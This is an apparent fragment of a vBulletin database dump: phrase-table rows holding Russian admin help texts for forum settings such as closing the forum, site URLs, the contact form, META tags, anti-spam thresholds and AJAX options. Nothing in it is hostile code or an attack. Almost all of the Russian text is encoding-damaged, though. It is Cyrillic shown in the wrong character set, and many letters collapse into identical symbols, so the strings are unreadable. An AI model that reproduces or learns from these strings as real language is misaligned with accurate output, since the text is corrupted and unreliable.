(22989, -1, 'options_options_vb_antispam_key_title', 'cphelptext', 'ÀÃòè-ñïà ì êëþ÷ äëÿ vBulletin îò Akismet', 'vbulletin', 'zCarot', 1194885285, '3.7.0 Beta 1'),
(22990, -1, 'options_options_bbactive_text', 'cphelptext', 'Îïðåäåëÿåò, ìîãóò ëè ïîñåòèòåëè èñïîëüçîâà òü ýòîò ôîðóì. Ãðè çà êðûòèè ôîðóìà òîëüêî à äìèÃèñòðà òîðû áóäóò èìåòü ê Ãåìó äîñòóï, à âñåì îñòà ëüÃûì áóäåò âûäà âà òüñÿ ñîîáùåÃèå îá îøèáêå è ïðè÷èÃà çà êðûòèÿ ôîðóìà . Âû ìîæåòå îòðåäà êòèðîâà òü ýòî ñîîáùåÃèå â ïà ðà ìåòðå \"Ãðè÷èÃà çà êðûòèÿ ôîðóìà \". \r\n\r\nÃîìÃèòå, ÷òî à äìèÃèñòðà òîðû âñ¸ åù¸ ñìîãóò ïîñåùà òü âûêëþ÷åÃÃûé ôîðóì, Ãî îÃè áóäóò âèäåòü óâåäîìëåÃèå î çà êðûòèå âÃèçó è ââåðõó êà æäîé ñòðà Ãèöû.', 'vbulletin', '', 0, ''),
(22991, -1, 'options_options_bbactive_title', 'cphelptext', 'Ôîðóì îòêðûò', 'vbulletin', '', 0, ''),
(22992, -1, 'options_options_socnet_groups_albums_enabled_text', 'cphelptext', 'Åñëè \"Äà \", òî ëþáûå ó÷à ñòÃèêè ãðóïïû ñìîãóò äîáà âèòü â ãðóïïó èçîáðà æåÃèÿ èç ñâîèõ à ëüáîìîâ.', 'vbulletin', 'zCarot', 1209722727, '3.7.1'),
(22993, -1, 'options_options_socnet_groups_albums_enabled_title', 'cphelptext', 'Âêëþ÷èòü èçîáðà æåÃèÿ ãðóïïû', 'vbulletin', 'zCarot', 1199282230, '3.7.0 Beta 4'),
(22994, -1, 'options_options_vb_antispam_posts_text', 'cphelptext', 'Åñëè ïîëüçîâà òåëü ÃÃ¥ Ãà õîäèòñÿ â ãðóïïå ìîäåðà òîðîâ è èìååò êîëè÷åñòâî ñîîáùåÃèé Ãèæå óêà çà ÃÃîãî çäåñü, òî âñå äà ÃÃûå, êîòîðûå îà îòïðà âèò Ãà ôîðóì, áóäóò ïåðåäà Ãû Ãà ïðîâåðêó â à Ãòè-ñïà ì ñåðâèñ. Åñëè âû óêà æèòå çäåñü 0 , òî âñå ñîîáùåÃèÿ áóäóò ïðîâåðÿòüñÿ Ãà ñïà ì.', 'vbulletin', 'zCarot', 1194885603, '3.7.0 Beta 1'),
(22995, -1, 'options_options_vb_antispam_posts_title', 'cphelptext', 'Ãîðîã ñîîáùåÃèé äëÿ îáÃà ðóæåÃèÿ ñïà ìà ', 'vbulletin', 'zCarot', 1194885603, '3.7.0 Beta 1'),
(22996, -1, 'options_options_bbclosedreason_text', 'cphelptext', 'Ãòî òåêñò, êîòîðûé îòîáðà æà åòñÿ ïîëüçîâà òåëÿì ïðè ïîïûòêå çà éòè Ãà çà êðûòûé ôîðóì.', 'vbulletin', '', 0, ''),
(22997, -1, 'options_options_bbclosedreason_title', 'cphelptext', 'Ãðè÷èÃà çà êðûòèÿ ôîðóìà ', 'vbulletin', '', 0, ''),
(22998, -1, 'options_options_bbtitle_text', 'cphelptext', 'Ãòî Ãà çâà Ãèå âà øåãî ôîðóìà . ÃŽÃî îòîáðà æà åòñÿ â çà ãîëîâêå êà æäîé ñòðà Ãèöû, à òà êæå â Ãà âèãà öèîÃÃîé ïà Ãåëè è â äðóãèõ ìåñòà õ.', 'vbulletin', '', 0, ''),
(22999, -1, 'options_options_bbtitle_title', 'cphelptext', 'Ãà çâà Ãèå ôîðóìà ', 'vbulletin', '', 0, ''),
(23000, -1, 'options_options_bburl_text', 'cphelptext', 'Ãòî URL âà øåãî ôîðóìà , áåç \"/\" èëè \"index.php\" â êîÃöå. Ãðèìåðû ïðà âèëüÃûõ à äðåñîâ: \r\n\r\nhttp://www.example.com \r\nhttp://www.example.com/forum \r\nÃðèìåð Ãåïðà âèëüÃûõ à äðåñîâ: \r\nhttp://www.example.com/ (ïîñëåäÃèé ñëåø - ëèøÃèé) \r\nhttp://www.example.com/forum/index.php (â êîÃöå ÃÃ¥ äîëæÃî áûòü ñëåøåé èëè index.php)', 'vbulletin', '', 0, ''),
(23001, -1, 'options_options_bburl_title', 'cphelptext', 'URL ôîðóìà ', 'vbulletin', '', 0, ''),
(23002, -1, 'options_options_hometitle_text', 'cphelptext', 'Ãòî çà ãîëîâîê ãëà âÃîé ñòðà Ãèöû âà øåãî ôîðóìà . Ññûëêà Ãà ýòó ñòðà Ãèöó ïî óìîë÷à Ãèþ ïîÿâëÿåòñÿ â øà ïêå êà æäîé ñòðà Ãèöû ôîðóìà .', 'vbulletin', '', 0, ''),
(23003, -1, 'options_options_hometitle_title', 'cphelptext', 'Ãà çâà Ãèå ñà éòà ', 'vbulletin', '', 0, ''),
(23004, -1, 'options_options_homeurl_text', 'cphelptext', 'Ãòî URL ãëà âÃîé ñòðà Ãèöû âà øåãî ôîðóìà . Îà áóäåò èñïîëüçîâà à (âìåñòå ñ \"Ãà çâà Ãèåì ãëà âÃîé ñòðà Ãèöû\") äëÿ ñîçäà Ãèÿ ññûëêè Ãà ãëà âÃóþ ñòðà Ãèöó âà øåãî ôîðóìà â øà ïêå êà æäîé åãî ñòðà Ãèöû.', 'vbulletin', '', 0, ''),
(23005, -1, 'options_options_homeurl_title', 'cphelptext', 'URL ãëà âÃîé ñòðà Ãèöû', 'vbulletin', '', 0, ''),
(23006, -1, 'options_options_contactuslink_text', 'cphelptext', 'Ãòî ññûëêà äëÿ îáðà òÃîé ñâÿçè ñ à äìèÃèñòðà òîðîì ôîðóìà . Ãòà âñòðîåÃÃà ÿ ôîðìà îòïðà âêè ýëåêòðîÃÃîãî ïèñüìà áóäåò Ãà õîäèòüñÿ â \"sendmessage.php\", ëèáî âû ìîæåòå èñïîëüçîâà òü à äðåñ ýëåêòðîÃÃîé ïî÷òû. Åñëè âû èñïîëüçóåòå à äðåñ, âû äîëæÃû äîáà âèòü \"mailto:\" ê Ãà ÷à ëó à äðåñà , ýòî áóäåò âûãëÿäåòü ïðèìåðÃî òà ê: \r\nmailto:mail@example.com \r\nÅñëè âû èñïîëüçóåòå âñòðîåÃÃóþ ôîðìó, âû ìîæåòå óêà çà òü ïðåäóñòà ÃîâëåÃÃûå òåìû ïèñåì â êîÃòà êòÃîé èÃôîðìà öèè.', 'vbulletin', '', 0, ''),
(23007, -1, 'options_options_contactuslink_title', 'cphelptext', 'Ñâÿçü ñ à äìèÃèñòðà öèåé', 'vbulletin', '', 0, ''),
(23008, -1, 'options_options_contactustype_text', 'cphelptext', 'Ãòî îïöèÿ îïðåäåëÿåò ìîãóò èëè Ãåò ãîñòè (Ãåçà ðåãèñòðèðîâà ÃÃûå èëè ÃÃ¥ âîøåäøèå) èñïîëüçîâà òü ôóÃêöèþ îòïðà âêè ýëåêòðîÃÃîãî ïèñüìà ÷åðåç ñòðà Ãèöó Îáðà òÃà ÿ ñâÿçü . \r\n\r\nÅñëè âû ðà çðåøèòå äîñòóï ãîñòÿì ê ýòîé ñòðà Ãèöå, òî âû ìîæåòå ïîæåëà òü, ÷òîáû îÃè ââîäèëè òåêñò ñ èçîáðà æåÃèÿ, äëÿ ïðåäîòâðà ùåÃèÿ èñïîëüçîâà Ãèÿ ýòîé ôîðìû ìà øèÃà ìè. Ãòî ïðåäîòâðà òèò âîçìîæÃûé ñïà ì Ãà âà ø ÿùèê. Ãðîâåðêà èçîáðà æåÃèÿ ïðèìåÃèìà òîëüêî ê ãîñòÿì ôîðóìà .', 'vbulletin', '', 0, ''),
(23009, -1, 'options_options_contactustype_title', 'cphelptext', 'Ãðîâåðêà äëÿ îáðà òÃîé ñâÿçè', 'vbulletin', '', 0, ''),
(23010, -1, 'options_options_contactusoptions_text', 'cphelptext', 'Åñëè âû èñïîëüçóåòå âñòðîåÃÃóþ ôîðìó sendmessage.php, âû ìîæåòå óêà çà òü ïðåäóñòà ÃîâëåÃÃûå òåìû ïèñåì äëÿ ïîëüçîâà òåëåé. Òåìà \"äðóãîå\" áóäåò äîáà âëåÃà ê ëþáûì, óêà çà ÃÃûì çäåñü. \r\nÊà æäà ÿ òåìà äîëæÃà áûòü Ãà îòäåëüÃîé ñòðîêå, òî åñòü â êà ÷åñòâå ðà çäåëèòåëÿ âûñòóïà åò âîçâðà ò êà ðåòêè (Ãà æìèòå <Enter>). Åñëè âû æåëà åòå ïîñëà òü ïèñüìî îïðåäåë¸ÃÃîé òåìû îïðåäåë¸ÃÃîìó ïîëüçîâà òåëþ, òî ëèáî óêà æèòå åãî ID Ãà ôîðóìå, ëèáî à äðåñ ýëåêòðîÃÃîé ïî÷òû. Âû ìîæåòå ñäåëà òü ýòî, ïîìåñòèâ ýòî â ñêîáêà õ ïåðåä òåìîé. Ãðèìåðû: \r\n{1} Îáðà òÃà ÿ ñâÿçü \r\n{mymail@example.com} Ãîìîãèòå \r\nÃåãèñòðà öèÿ \r\nÃèñüìî ïî ïåðâîìó âà ðèà Ãòó \"Îáðà òÃà ÿ ñâÿçü\" áóäåò Ãà ïðà âëåÃî Ãà à äðåñ ýëåêòðîÃÃîé ïî÷òû ïîëüçîâà òåëÿ ñ ID 1. Ãèñüìî ïî âòîðîìó âà ðèà Ãòó \"Ãîìîãèòå\" áóäåò îòîñëà Ãî Ãà à äðåñ ýëåêòðîÃÃîé ïî÷òû \"mymail@example.com\". Ãèñüìî ïî òðåòüåìó âà ðèà Ãòó \"Ãåãèñòðà öèÿ\" áóäåò îòîñëà Ãî ïî ýëåêòðîÃÃîé ïî÷òå âåá-ìà ñòåðó.', 'vbulletin', '', 0, ''),
(23011, -1, 'options_options_contactusoptions_title', 'cphelptext', 'Îïöèè îáðà òÃîé ñâÿçè', 'vbulletin', '', 0, ''),
(23012, -1, 'options_options_lightboxenabled_text', 'cphelptext', 'ÂÃóòðåÃÃåå îêÃî äëÿ èçîáðà æåÃèé ïîçâîëÿåò ïðîñìà òðèâà òü áîëüøèå èçîáðà æåÃèÿ âÃóòðè îêÃà áðà óçåðà áåç èçìåÃÃ¥Ãèÿ òåêóùåãî îòîáðà æåÃèÿ ñòðà Ãèöû. Òà êîå îêÃî ìîæåò áûòü âûçâà Ãî Ãà âåäåÃèåì è/èëè Ãà æà òèåì Ãà ìèÃèà òþðó / ññûëêó Ãà èçîáðà æåÃèå.', 'vbulletin', 'zCarot', 1194969948, '3.7.0 Beta 1'),
(23013, -1, 'options_options_lightboxenabled_title', 'cphelptext', 'Èñïîëüçîâà òü âÃóòðåÃÃåå îêÃî äëÿ èçîáðà æåÃèé', 'vbulletin', 'zCarot', 1194969948, '3.7.0 Beta 1'),
(23014, -1, 'options_options_webmasteremail_text', 'cphelptext', 'Àäðåñ ýëåêòðîÃÃîé ïî÷òû à äìèÃèñòðà òîðà (âåá-ìà ñòåðà ) ôîðóìà . Îà áóäåò èñïîëüçîâà à êà ê à äðåñ \"Êîìó\" äëÿ Ãåêîòîðûõ ýëåêòðîÃÃûõ ïèñåì, îòïðà âëÿåìûõ ñèñòåìîé.', 'vbulletin', '', 0, ''),
(23015, -1, 'options_options_webmasteremail_title', 'cphelptext', 'Àäðåñ ýëåêòðîÃÃîé ïî÷òû à äìèÃèñòðà òîðà ', 'vbulletin', '', 0, ''),
(23016, -1, 'options_options_privacyurl_text', 'cphelptext', 'Ãòî URL âà øåãî ïîëîæåÃèÿ î ñåêðåòÃîñòè è ÷à ñòÃîé èÃôîðìà öèè, åñëè îÃî ó âà ñ åñòü. Åñëè Ãåò, òî ïðîïóñòèòå ýòîò ïóÃêò.', 'vbulletin', '', 0, ''),
(23017, -1, 'options_options_privacyurl_title', 'cphelptext', 'URL ïîëîæåÃèÿ î ñåêðåòÃîñòè è ÷à ñòÃîé èÃôîðìà öèè', 'vbulletin', '', 0, ''),
(23018, -1, 'options_options_copyrighttext_text', 'cphelptext', 'Ââåäèòå òåêñò, êîòîðûé áóäåò îòîáðà æà òüñÿ âÃèçó êà æäîé ñòðà Ãèöû. Ãòî äîïîëÃÃ¥Ãèå ê ñîîáùåÃèþ ðà çðà áîò÷èêà , êîòîðîå äîëæÃî îòîáðà æà òüñÿ ïî ëèöåÃçèîÃÃîìó ñîãëà øåÃèþ.', 'vbulletin', '', 0, ''),
(23019, -1, 'options_options_copyrighttext_title', 'cphelptext', 'Òåêñò à âòîðñêèõ ïðà â', 'vbulletin', '', 0, ''),
(23020, -1, 'options_options_companyname_text', 'cphelptext', 'Ââåäèòå Ãà çâà Ãèå âà øåé êîìïà Ãèè. Åñëè âû èñïîëüçóåòå COPPA (ñì. Îïöèè ðåãèñòðà öèè ïîëüçîâà òåëåé ), ýòîé ñèñòåìîé áóäåò èñïîëüçîâà òüñÿ óêà çà ÃÃîå çäåñü Ãà çâà Ãèå êîìïà Ãèè.', 'vbulletin', 'zCarot', 1205430879, '3.7.0 Release Candidate 1'),
(23021, -1, 'options_options_companyname_title', 'cphelptext', 'Ãà çâà Ãèå êîìïà Ãèè', 'vbulletin', '', 0, ''),
(23022, -1, 'options_options_faxnumber_text', 'cphelptext', 'Ââåäèòå çäåñü Ãîìåð ôà êñà âà øåé êîìïà Ãèè. Åñëè âû èñïîëüçóåòå COPPA (ñì. Îïöèè ðåãèñòðà öèè ïîëüçîâà òåëåé ), òî ýòîò Ãîìåð ôà êñà áóäåò îòîáðà æà òüñÿ êà ê îäèà èç ñïîñîáîâ äîñòà âêè ðà çðåøåÃèÿ ðîäèòåëåé/îïåêóÃîâ Ãà ó÷à ñòèå â ôîðóìå. \r\nÅñëè âà ì Ãóæåà Ãîìåð ôà êñà , òî âû ìîæåòå ïîñìîòðåòü Ãà ñà éòå eFax , êîòîðûé ïðåäîñòà âëÿåò ñåðâèñû ôà êñà , îñÃîâà ÃÃûå Ãà èÃòåðÃåòå.', 'vbulletin', 'zCarot', 1205430879, '3.7.0 Release Candidate 1'),
(23023, -1, 'options_options_faxnumber_title', 'cphelptext', 'Ôà êñ êîìïà Ãèè', 'vbulletin', '', 0, ''),
(23024, -1, 'options_options_address_text', 'cphelptext', 'Ââåäèòå à äðåñ âà øåé êîìïà Ãèè. Åñëè âû èñïîëüçóåòå COPPA (ñì. Îïöèè ðåãèñòðà öèè ïîëüçîâà òåëåé ), ýòîò à äðåñ áóäåò îòîáðà æà òüñÿ êà ê ñïîñîá äîñòà âêè ðà çðåøåÃèÿ ðîäèòåëåé/îò÷èìîâ Ãà ó÷à ñòèå â ôîðóìå ÷åðåç îáû÷Ãóþ ïî÷òó.', 'vbulletin', 'zCarot', 1205430879, '3.7.0 Release Candidate 1'),
(23025, -1, 'options_options_address_title', 'cphelptext', 'Àäðåñ êîìïà Ãèè', 'vbulletin', '', 0, ''),
(23026, -1, 'options_options_keywords_text', 'cphelptext', 'Êëþ÷åâûå ñëîâà Meta èñïîëüçóþòñÿ Ãåêîòîðûìè ïîèñêîâûìè ñèñòåìà ìè äëÿ îïðåäåëåÃèÿ ñîäåðæà Ãèÿ ñòðà Ãèö è âÃåñåÃèÿ èõ â ðåéòèÃãè. Äðóãèå ïîèñêîâûå ñèñòåìû, Ãà ïðèìåð Google, ÃÃ¥ èñïîëüçóþò êëþ÷åâûå ñëîâà â ïîèñêå. \r\n Âñå êëþ÷åâûå ñëîâà , êîòîðûå âû ñþäà ââåäåòå, áóäóò ïîìåùåÃû â êîä êëþ÷åâûõ ñëîâ meta â çà ãîëîâêå êà æäîé ñòðà Ãèöû. Ãà çäåëÿéòå êëþ÷åâûå ñëîâà çà ïÿòîé áåç ïðîáåëîâ.', 'vbulletin', '', 0, ''),
(23027, -1, 'options_options_keywords_title', 'cphelptext', 'Êëþ÷åâûå ñëîâà META', 'vbulletin', '', 0, ''),
(23028, -1, 'options_options_description_text', 'cphelptext', 'ÃŒETA îïèñà Ãèÿ èñïîëüçóþòñÿ Ãåêîòîðûìè ïîèñêîâûìè ìà øèÃà ìè äëÿ ñîñòà âëåÃèÿ îïèñà Ãèÿ ýòîé ñòðà Ãèöû è å¸ îöåÃêè. Äðóãèå ïîèñêîâûå ìà øèÃû, êà ê, Ãà ïðèìåð, Google, ÃÃ¥ èñïîëüçóþò ýòè îïèñà Ãèå. \r\nÂâåäèòå Ãåáîëüøîå îïèñà Ãèå âà øåãî ñà éòà , è ýòîò òåêñò áóäåò ðà çìåùåà â çà ãîëîâêå êà æäîé ñòðà Ãèöû â òåãå META îïèñà Ãèÿ. ÃîëüøèÃñòâî ìà øèà áóäóò ñ÷èòûâà òü ìà êñèìóì 255 ñèìâîëîâ ýòîãî îïèñà Ãèÿ.', 'vbulletin', '', 0, ''),
(23029, -1, 'options_options_description_title', 'cphelptext', 'ÃŒETA îïèñà Ãèå', 'vbulletin', '', 0, ''),
(23030, -1, 'options_options_useforumjump_text', 'cphelptext', 'ÌåÃþ áûñòðîãî ïåðåõîäà ïîÿâëÿåòñÿ ïî óìîë÷à Ãèþ Ãà áîëüøèÃñòâå ñòðà Ãèö è ïîçâîëÿåò áûñòðî ïåðåéòè ê ëþáîìó ðà çäåëó âà øåãî ôîðóìà , à òà êæå ê äðóãèì ìåñòà ì (ïîèñêó, ëè÷Ãûì ñîîáùåÃèÿì è ò.ä.). Òà ê êà ê ýòî î÷åÃü ñèëüÃî âëèÿåò Ãà ïðîèçâîäèòåëüÃîñòü, òî ðåêîìåÃäóåòñÿ âûêëþ÷èòü åãî Ãà áîëüøèõ ôîðóìà õ, ïîòîìó ÷òî îÃî áóäåò ãåÃåðèðîâà òü áîëüøîé HTML êîä, ÷òî óâåëè÷èò ðà çìåð ñòðà Ãèö è òðà ôèê.', 'vbulletin', '', 0, ''),
(23031, -1, 'options_options_useforumjump_title', 'cphelptext', 'Èñïîëüçîâà òü ìåÃþ áûñòðîãî ïåðåõîäà ', 'vbulletin', '', 0, ''),
(23032, -1, 'options_options_pagenavpages_text', 'cphelptext', 'Ãà ñòðà Ãèöà õ òåì è ðà çäåëîâ, êà ê è â ñïèñêå ëè÷Ãûõ ñîîáùåÃèé è â äðóãèõ ìåñòà õ, ïðè Ãà ëè÷èè ìÃîæåñòâà ñòðà Ãèö áóäóò îòîáðà æà òüñÿ ññûëêè Ãà Ãèõ. Ãòîò ïà ðà ìåòð îïðåäåëÿåò, ñêîëüêî ññûëîê Ãà ñòðà Ãèöû áóäóò îòîáðà æà òüñÿ Ãà òåêóùåé. Óñòà Ãîâêà Ãà 0 ïîêà æåò ññûëêè Ãà âñå ñòðà Ãèöû.', 'vbulletin', '', 0, ''),
(23033, -1, 'options_options_pagenavpages_title', 'cphelptext', 'Ññûëîê Ãà Ãîìåðà ñòðà Ãèö', 'vbulletin', '', 0, ''),
(23034, -1, 'options_options_pagenavs_text', 'cphelptext', 'Ãà ñòðà Ãèöà õ òåì è ðà çäåëîâ, à òà êæå â ñïèñêå ëè÷Ãûõ ñîîáùåÃèé è â äðóãèõ ìåñòà õ, åñëè òðåáóåòñÿ äëÿ îòîáðà æåÃèÿ ìÃîãî ñòðà Ãèö, òî â ýòîé îïöèè âû ìîæåòå âûáðà òü, Ãà ñêîëüêî ñòðà Ãèö ìîæÃî ïåðåìåñòèòüñÿ, îòÃîñèòåëüÃî òåêóùåé. Ãà ïðèìåð, åñëè âû äîáà âèòå â ñïèñîê ÷èñëî 10, òî Ãà ýòîé ñòðà Ãèöå áóäóò ññûëêè äëÿ ïåðåõîäà Ãà 10 ñòðà Ãèö Ãà çà ä (-10) è Ãà 10 ñòðà Ãèö âïåð¸ä (+10).\r\n\r\nÃà çäåëÿéòå öèôðû ïðîáåëà ìè.', 'vbulletin', '', 0, ''),
(23035, -1, 'options_options_pagenavs_title', 'cphelptext', 'ÎòÃîñèòåëüÃûå ïåðåõîäû äëÿ Ãà âèãà òîðà ïî ñòðà Ãèöà ì', 'vbulletin', '', 0, ''),
(23036, -1, 'options_options_enableaccess_text', 'cphelptext', 'Ìà ñêè äîñòóïà ïîçâîëÿþò ðà çðåøà òü èëè çà ïðåùà òü äîñòóï ê ÷à ñòè ôîðóìà äëÿ îïðåäåëåÃÃûõ ïîëüçîâà òåëåé. ×òîáû èõ èñïîëüçîâà òü, âû äîëæÃû âêëþ÷èòü ýòó îïöèþ. Ãòà îïöèÿ òà êæå âëèÿåò Ãà òî, ìîãóò èëè Ãåò ïîëüçîâà òåëè ïðîñìà òðèâà òü ðà çäåëû, ê êîòîðûì ó Ãèõ Ãåò äîñòóïà . (Åñëè óñòà Ãîâèòü \"Ãåò\", îÃè ñìîãóò âèäåòü òà êèå ðà çäåëû èõ â ñïèñêå ðà çäåëîâ, Ãî ÃÃ¥ ñìîãóò âîéòè â Ãèõ. Åñëè óñòà Ãîâèòü \"Äà \", îÃè äà æå ÃÃ¥ óâèäÿò òà êèå ðà çäåëû.)', 'vbulletin', '', 0, ''),
(23037, -1, 'options_options_enableaccess_title', 'cphelptext', 'Âêëþ÷èòü ìà ñêè äîñòóïà ', 'vbulletin', '', 0, ''),
(23038, -1, 'options_options_showimicons_text', 'cphelptext', 'Åñëè ïîëüçîâà òåëü ââåë ñâîè èìåÃà ïîëüçîâà òåëåé/Ãîìåðà äëÿ Skype, ICQ, AIM, MSN è/èëè Yahoo! Messenger â ñâî¸ì ïðîôèëå è ýòîò ïà ðà ìåòð óñòà Ãîâëåà Ãà \"Äà \", òî èêîÃêè, îïèñûâà þùèå èÃôîðìà öèþ îá ýòîì, áóäóò âñòà âëåÃû â ðà çÃîîáðà çÃûå ìåñòà , êà ê, Ãà ïðèìåð, â ñîîáùåÃèÿ, â ñïèñîê ïîëüçîâà òåëåé è ò.ä.. Åñëè \"Ãåò\", òî èÃôîðìà öèÿ áóäåò îòîáðà æà òüñÿ â ïðîôèëå ïîëüçîâà òåëåé â âèäå òåêñòà .', 'vbulletin', '', 0, ''),
(23039, -1, 'options_options_showimicons_title', 'cphelptext', 'Ãîêà çûâà òü èêîÃêè ïðîãðà ìì áûñòðûõ ñîîáùåÃèé', 'vbulletin', '', 0, ''),
(23040, -1, 'options_options_addtemplatename_text', 'cphelptext', 'Ãðè ðåäà êòèðîâà Ãèè è îòëà äêå øà áëîÃîâ áûâà åò ïîëåçÃî çÃà òü Ãà çâà Ãèå øà áëîÃà , ÷òîáû ïðè ïðîñìîòðå èñõîäÃèêà ñòðà Ãèöû âû ìîãëè áû ñðà çó îïðåäåëèòü, êà êîé øà áëîà îÃà èñïîëüçîâà ëà . ÊîÃå÷Ãî ïðè îáû÷Ãîì èñïîëüçîâà Ãèè ëó÷øå âûêëþ÷èòü ýòó îïöèþ, ÷òîáû ÃÃ¥ óâåëè÷èâà òü ðà çìåðû ñòðà Ãèö.', 'vbulletin', '', 0, ''),
(23041, -1, 'options_options_addtemplatename_title', 'cphelptext', 'Äîáà âëåÃèå Ãà çâà Ãèé øà áëîÃîâ â êîììåÃòà ðèè HTML', 'vbulletin', '', 0, ''),
(23042, -1, 'options_options_usestrikesystem_text', 'cphelptext', 'ÃåêîìåÃäóåòñÿ âêëþ÷èòü ýòó îïöèþ, ÷òîáû çëîÃà ìåðåÃÃûå ïîëüçîâà òåëè ÃÃ¥ ìîãëè ïîäîáðà òü ïà ðîëü ê à êêà óÃòà ì ïîëüçîâà òåëåé.', 'vbulletin', '', 0, ''),
(23043, -1, 'options_options_usestrikesystem_title', 'cphelptext', 'Èñïîëüçîâà òü ñèñòåìó \"à Ãòèïîäáîðà \" ïà ðîëÿ', 'vbulletin', '', 0, ''),
(23044, -1, 'options_options_forumleaders_text', 'cphelptext', 'Ãòà îïöèÿ ññûëà åòñÿ Ãà ýòó ñòðà Ãèöó . \r\n\r\nÂû ìîæåòå óêà çà òü êà êèå ãðóïïû áóäóò îòîáðà æà òüñÿ Ãà ýòîé ñòðà Ãèöå â âà øåì óïðà âëåÃèè ãðóïïà ìè ïîëüçîâà òåëåé . Îòðåäà êòèðóéòå ãðóïïó ïîëüçîâà òåëåé è âûáåðèòå îïöèþ Îòîáðà æà òü ÷ëåÃîâ â ñïèñêå ãðóïïû . ÃÃ¥ ðåêîìåÃäóåòñÿ âêëþ÷à òü ýòó îïöèþ äëÿ áîëüøèõ ãðóïï, òà êèõ êà ê Çà ðåãèñòðèðîâà ÃÃûå ïîëüçîâà òåëè .', 'vbulletin', '', 0, ''),
(23045, -1, 'options_options_forumleaders_title', 'cphelptext', 'Âêëþ÷èòü îòîáðà æåÃèå ëèäåðîâ ôîðóìà ', 'vbulletin', '', 0, ''),
(23046, -1, 'options_options_allowedreferrers_text', 'cphelptext', 'Ãà ïðèìåð, åñëè ó âà ñ åñòü Ãåñêîëüêî ñà éòîâ, ñâÿçà ÃÃûõ ñ ôîðóìîì, èëè âû èñïîëüçóåòå ïðîäóêòû, êîòîðûå èñïîëüçóåò ïðèÃÿòèå äà ÃÃûõ ìåòîäîì POST èçâÃÃ¥, òî çäåñü âû ìîæåòå óêà çà òü ñ êà êèõ äîìåÃîâ ñëåäóåò ïðèÃèìà òü çà ïðîñû.', 'vbulletin', '', 0, ''),
(23047, -1, 'options_options_allowedreferrers_title', 'cphelptext', 'Ñïèñîê ðà çðåø¸ÃÃûõ äîìåÃîâ äëÿ ìåòîäà post', 'vbulletin', '', 0, ''),
(23048, -1, 'options_options_threadmarking_text', 'cphelptext', 'Ãòîò ïà ðà ìåòð îïðåäåëÿåò, êà ê òåìû è ñîîáùåÃèÿ ïîìå÷à þòñÿ ïðî÷èòà ÃÃûìè.\r\n\r\nÎñÃîâûâà ÿñü Ãà ÃÃ¥ à êòèâÃîñòè/cookie - åñëè ïîëüçîâà òåëü áûë Ãåà êòèâåà â òå÷åÃèè óêà çà ÃÃîãî ïðîìåæóòêà âðåìåÃè (çÃà ÷åÃèå óêà çûâà åòñÿ â îïöèè òà éìà óòà cookie), òî âñå òåìû è ðà çäåëû ïîìå÷à þòñÿ ïðî÷èòà ÃÃûìè. ÎòäåëüÃûå òåìû îòìå÷à þòñÿ ïðî÷èòà ÃÃûìè â òå÷åÃèè ñåññèè ÷åðåç cookies. Ãòà îïöèÿ ðà áîòà åò òà ê æå, êà ê è âî âñåõ âåðñèÿ ôîðóìà äî 3.5. \r\nÃà çà äà ÃÃûõ (ÃÃ¥ à âòîìà òè÷åñêà ÿ ïîìåòêà ðà çäåëîâ) - ýòà îïöèÿ èñïîëüçóåò áà çó äà ÃÃûõ äëÿ õðà ÃÃ¥Ãèÿ ïîìåòîê î ïðî÷òåÃèè òåì è ðà çäåëîâ. Ãòî ïîçâîëÿåò èñïîëüçîâà òü îòäåëüÃûå ïîìåòêè äëÿ êà æäîãî ñëó÷à ÿ. ÎäÃà êî, ðà çäåë ñ÷èòà åòñÿ ïðî÷èòà ÃÃûì, åñëè â øì ïðî÷èòà Ãû âñå òåìû, ïîýòîìó ïîëüçîâà òåëü äîëæåà áóäåò ïðîñìîòðåòü âñå Ãåïðî÷èòà ÃÃûå òåìû. Ãòà îïöèÿ çà Ãèìà åò áîëüøå ìåñòà â áà çå äà ÃÃûõ è äà ¸ò áîëüøóþ Ãà ãðóçêó Ãà ïðîöåññîð, ÷åì ïðåäûäóùà ÿ. \r\nÃà çà äà ÃÃûõ (à âòîìà òè÷åñêà ÿ ïîìåòêà ðà çäåëîâ) - ýòà îïöèÿ èñïîëüçóåò òîæå ñà ìîå, ÷òî è ïðåäûäóùà ÿ, Ãî ðà çäåëû à âòîìà òè÷åñêè îòìå÷à þòñÿ ïðî÷èòà ÃÃûìè, êîãäà áóäåò ïðî÷èòà Ãà ïîñëåäÃÿÿ òåìà â Ãèõ. Ãòî î÷åÃü ïîëåçÃà ÿ îïöèÿ äëÿ êîÃå÷Ãûõ ïîëüçîâà òåëåé, Ãî îÃà äà ¸ò ñà ìóþ áîëüøóþ Ãà ãðóçêó Ãà ïðîöåññîð. \r\n ', 'vbulletin', 'zCarot', 1149029232, '3.6.0 Beta 1'),
(23049, -1, 'options_options_threadmarking_title', 'cphelptext', 'Òèï ïîìåòêè òåì/ðà çäåëîâ êà ê ïðî÷èòà ÃÃûõ', 'vbulletin', '', 0, ''),
(23050, -1, 'options_options_disable_ajax_text', 'cphelptext', 'Ãòà îïöèÿ ïîçâîëÿåò âûêëþ÷èòü âñå èëè òîëüêî îïðåäåë¸ÃÃûå ôóÃêöèè AJAX. \r\n \r\n ñâÿçè ñ îñîáåÃÃîñòÿìè AJAX, Ãåêîòîðûå ôóÃêöèè ìîãóò ÃÃ¥ ïîëÃîñòüþ ðà áîòà òü Ãà ôîðóìà õ, èñïîëüçóþùèõ ÃÃ¥ ëà òèÃñêèé à ëôà âèò ñ äîïîëÃèòåëüÃûìè ìîäóëÿìè, òà êèìè êà ê IconV. Ãà ïðèìåð, áûñòðûé îòâåò, îñÃîâà ÃÃûé Ãà AJAX, ìîæåò êîððåêòÃî ðà áîòà òü Ãà ôîðóìå, Ãî ïîäïèñêà Ãà òåìó ìîæåò ÃÃ¥ ïðà âèëüÃî îòîáðà æà òüñÿ. Åñëè ó âà ñ âîçÃèêÃóò ïîõîæèå ïðîáëåìû, òî ñòîèò ïðåæäå âñåãî ïîïðîáîâà òü \"Âûêëþ÷èòü ïðîáëåìÃûå ôóÃêöèè AJAX\".', 'vbulletin', 'zCarot', 1142519066, '3.6.0 Beta 1'),
(23051, -1, 'options_options_disable_ajax_title', 'cphelptext', 'Âûêëþ÷åÃèå ôóÃêöèé AJAX', 'vbulletin', 'zCarot', 1142519066, '3.6.0 Beta 1'),
